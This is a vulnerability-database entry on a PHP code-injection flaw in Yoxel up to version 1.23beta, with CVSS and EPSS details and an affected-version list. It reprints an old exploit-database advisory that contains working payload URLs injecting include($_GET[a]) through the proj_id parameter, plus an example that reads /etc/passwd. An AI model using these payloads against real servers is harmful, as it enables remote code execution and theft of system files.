Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9 |
|
AV:N/AC:L/Au:S/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 6606
Publication date : 2008-09-26 22:00 +00:00
Author : dun
EDB Verified : Yes
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
###############################################################
# [ Yoxel <= 1.23beta ] PHP code Injection Vulnerability #
###############################################################
#
# Script: "Yoxel is a hidden gem. This Open Source project provides customer/business focused Agile Product Management tools in PHP."
#
# Script site: http://www.yoxel.com/
# Download: http://sourceforge.net/projects/yoxel/
#
# Vuln:
# http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2
# http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2
#
#
# (1) Bug: ./yoxel_v1.23beta/itpm/itpm_estimate.php (line: 40)
#
# ...
# require_once('includes/project/estimate_inc.php');
# ...
#
#
# (2) Bug: ./yoxel_v1.23beta/includes/project/estimate_inc.php (lines: 85-99)
#
# ...
# if(isset($_GET['rid'])){
# $rids=explode(':',$_GET['rid']);
# if(isset($_GET['proj_id']) && $_GET['proj_id']){
# $proj_id=$_GET['proj_id'];
# eval("\$pps= new $cname(".$_GET['proj_id'].");"); // PHP inj 1
# }
# }elseif(isset($_GET['proj_id']) && !empty($_GET['proj_id'])){
# $proj_id=$_GET['proj_id'];
#
# if(isset($_GET['pr_list_type']))
# $plt=$_GET['pr_list_type'];
# else
# $plt='full';
#
# eval("\$pps= new $cname($proj_id);"); // PHP inj 2
# ...
#
#
# After php injection: eval( $pps= new ITPlan();include('/etc/passwd');die(2); );
#
# IMPORTANT: This bug doesn't work, when you aren't logged in Yoxel ;(((
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-09-27]
Products Mentioned
Configuraton 0
Yoxel>>Yoxel >> Version To (including) 1.23beta
Yoxel>>Yoxel >> Version 1.06beta
Yoxel>>Yoxel >> Version 1.07beta
Yoxel>>Yoxel >> Version 1.08beta
Yoxel>>Yoxel >> Version 1.09beta
Yoxel>>Yoxel >> Version 1.10beta
Yoxel>>Yoxel >> Version 1.11beta
Yoxel>>Yoxel >> Version 1.12beta
Yoxel>>Yoxel >> Version 1.13beta
Yoxel>>Yoxel >> Version 1.14beta
Yoxel>>Yoxel >> Version 1.15beta
Yoxel>>Yoxel >> Version 1.16beta
Yoxel>>Yoxel >> Version 1.17beta
Yoxel>>Yoxel >> Version 1.18beta
Yoxel>>Yoxel >> Version 1.19beta
Yoxel>>Yoxel >> Version 1.20
Yoxel>>Yoxel >> Version 1.20beta
Yoxel>>Yoxel >> Version 1.21
Yoxel>>Yoxel >> Version 1.21beta
Yoxel>>Yoxel >> Version 1.22
Yoxel>>Yoxel >> Version 1.22beta
References